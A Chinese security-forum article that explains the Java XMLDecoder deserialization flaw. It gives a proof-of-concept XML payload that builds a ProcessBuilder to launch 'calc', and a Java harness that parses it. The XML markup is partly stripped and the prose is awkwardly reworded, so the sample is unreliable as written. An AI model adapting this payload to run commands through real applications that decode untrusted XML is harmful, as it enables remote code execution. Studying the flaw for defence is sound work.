欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

XMLDecoder反序列化漏洞

来源:本站整理 作者:佚名 时间:2017-09-01 TAG: 我要投稿

Java 挪用XMLDecoder剖析XML文件的时刻,存在口令运行的漏洞。
样例XML文件以下所示:
xml version="1.0" encoding="UTF-8"?>
java version="1.8.0_131" class="java.beans.XMLDecoder">
    object class="java.lang.ProcessBuilder">
        array class="java.lang.String" length="1">
            void index="0">
                string>calcstring>
            void>
        array>
        void method="start" />
    object>
java>
对应Java代码以下所示:
package xmldecoder;
 
import java.io.BufferedInputStream; 
import java.io.FileInputStream;
import java.io.FileNotFoundException;
import java.io.IOException; 
import java.util.ArrayList; 
import java.util.List;
 
  
 
 
public class XmlDecoderTest {
 
    public static void main(String[] args) {
        // TODO Auto-generated method stub
        java.io.File file = new java.io.File("d:/tmp/xmldecoder.xml");
        
        java.beans.XMLDecoder xd = null;
        try {
            xd = new java.beans.XMLDecoder(new BufferedInputStream(new FileInputStream(file)));
        } catch (FileNotFoundException e) {
            // TODO Auto-generated catch block
            e.printStackTrace();
        } 
          
        Object s2 = xd.readObject(); 
        xd.close();
    }
 
}
履行后果以下所示:

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载